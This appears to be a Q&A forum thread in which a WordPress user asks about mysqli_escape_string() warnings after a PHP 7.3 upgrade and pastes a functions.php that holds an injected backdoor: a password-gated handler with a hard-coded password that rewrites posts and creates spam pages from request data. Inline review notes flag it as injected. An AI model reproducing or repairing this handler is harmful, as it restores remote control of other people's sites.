
I updated my PHP from 5.6 to 7.3. Now I'm getting:

Warning: mysqli_escape_string() expects exactly 2 parameters, 1 given in /home/rylzkggo/mysite/wp-content/themes/resca-child/functions.php on line 60

mysqli_escape_string() is valid PHP 7 code.

Not sure what is going on.

Here is the full code from my functions.php file, line 60:

// NOTE(review): this lookup is keyed on the raw request path. When exactly one row
// of the `{prefix}datalist` table matches REQUEST_URI, the row is printed and the
// request ends. `datalist` is not a WordPress core table and nothing in this block
// is theme-related, so it has the shape of injected code; confirm against a clean
// copy of the theme before treating it as legitimate.
// mysqli_escape_string() needs the connection as its first argument. Called with a
// single argument it raises the warning quoted above and, on PHP 7, produces no
// escaped value for the query. NOTE(review): adding the connection argument would
// make this lookup work again, which is not the goal if the block is injected.
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        // Fetch the matching row; the same WHERE clause is built a second time.
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string($_SERVER['REQUEST_URI']).'"');

        // A truthy full_content means the stored content is sent as the whole response.
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                // Otherwise the stored title, keywords, description and content are placed
                // into a page skeleton; none of these values is HTML-escaped here.
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                // Asks crawlers to index the page and follow its links.
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        // Ends the request here, so nothing after this point runs for a matching URL.
        exit;
    }

Here is the full code:

<?php

// NOTE(review): remote-control handler. It runs for any request that carries both
// an `action` and a `password` parameter where the password loosely equals (==) the
// hard-coded string below. No WordPress login, capability check or nonce appears
// anywhere in this block. A theme has no need for this; it has the shape of an
// injected backdoor, so compare functions.php with a clean copy of the theme and
// treat the literal below as a secret that is already known to others.
// Every mysqli_escape_string() call here passes one argument, but the function
// needs the connection first, so on PHP 7 each call only raises a warning.
// NOTE(review): supplying the connection would silence the warning and would also
// put this handler back in working order.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6a379b52a5a23b76dfd63f9c8fc88190'))
    {
        switch ($_REQUEST['action'])
            {
                // Prints guid, ID and any <div id="wp_cd_code"> payload of every published post.
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            // Capture the contents of an existing wp_cd_code div, if the post has one.
                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                // Rewrites the content of the post named by the `id` parameter: any existing
                // wp_cd_code div is removed and request-supplied `data` is appended in a new one.
                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysqli_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            // stripcslashes() decodes C-style escapes in the request data before it is stored.
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysqli_escape_string($post_content) . '" WHERE `ID` = "' . mysqli_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                // Manages rows of the `{prefix}datalist` table. With `remove_page` the row for
                // `url` is deleted; otherwise, with non-empty `content`, a row is inserted or
                // updated from the request parameters.
                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysqli_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            // The INSERT part stores `content` as sent; the ON DUPLICATE KEY part stores urldecode(content).
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysqli_escape_string($_REQUEST['url']).'", `title` = "'.mysqli_escape_string($_REQUEST['title']).'", `keywords` = "'.mysqli_escape_string($_REQUEST['keywords']).'", `description` = "'.mysqli_escape_string($_REQUEST['description']).'", `content` = "'.mysqli_escape_string($_REQUEST['content']).'", `full_content` = "'.mysqli_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysqli_escape_string($_REQUEST['title']).'", `keywords` = "'.mysqli_escape_string($_REQUEST['keywords']).'", `description` = "'.mysqli_escape_string($_REQUEST['description']).'", `content` = "'.mysqli_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysqli_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        // Ends the request once the action has been handled.
        die("");
    }


// NOTE(review): serving side of the `create_page` action earlier in this file. When
// exactly one `{prefix}datalist` row matches the raw REQUEST_URI, the stored row is
// printed and the request ends. `datalist` is not a WordPress core table; confirm
// against a clean copy of the theme whether any of this belongs in functions.php.
// mysqli_escape_string() is called with one argument although it needs the
// connection first, which is what raises the warning on PHP 7. NOTE(review): adding
// the connection argument would make this lookup work again, which is not the goal
// if the block is injected.
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        // Fetch the matching row; the same WHERE clause is built a second time.
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string($_SERVER['REQUEST_URI']).'"');
        // A truthy full_content means the stored content is sent as the whole response.
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                // Otherwise the stored title, keywords, description and content are placed
                // into a page skeleton; none of these values is HTML-escaped here.
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                // Asks crawlers to index the page and follow its links.
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        // Ends the request here, so nothing after this point runs for a matching URL.
        exit;
    }


?>

Please help. Sorry, I have been struggling for almost a few weeks now to get this fixed.

loudy
  • Did you check the documentation yet? If not, you should read it to understand what's going on and how to fix it: [mysqli_escape_string()](https://www.php.net/manual/en/function.mysqli-escape-string.php). – cabrerahector Oct 06 '19 at 05:47
  • It says to use mysqli_real_escape_string, so I used that instead, but it still gives me the same warning. Please help. – loudy Oct 06 '19 at 13:50
  • Good. Did you read the documentation of the [mysqli_real_escape_string()](https://www.php.net/manual/en/mysqli.real-escape-string.php) function as well? The answer to fix your issue is in there. – cabrerahector Oct 06 '19 at 15:36

1 Answer


Maybe it's late, but here's the answer!

You need to pass two parameters: the first is the database connection variable and the second is the input string you want to escape (for example, a value from a form).

example:

<?php
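$servername = "localhost";
$username = "username";
$password = "password";

// Creating a connection
$conn = new mysqli($servername, $username, $password);
// Check connection
if ($conn->connect_error) {
    // The driver message can name the host and account, so it goes to the
    // server log and the visitor only sees a generic failure.
    error_log("Connection failed: " . $conn->connect_error);
    die("Connection failed");
}

// Escaping follows the connection character set, so set it before escaping.
$conn->set_charset("utf8mb4");

// The connection is the first argument and the raw string is the second.
// mysqli_escape_string() is an alias of mysqli_real_escape_string().
// $post_content stands for whatever raw value is about to go into the query.
// The escaped value is only safe inside a quoted SQL string literal. A prepared
// statement with bound parameters (in WordPress: $wpdb->prepare()) removes the
// need for manual escaping.
$escaped_string = mysqli_real_escape_string($conn, $post_content);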

?>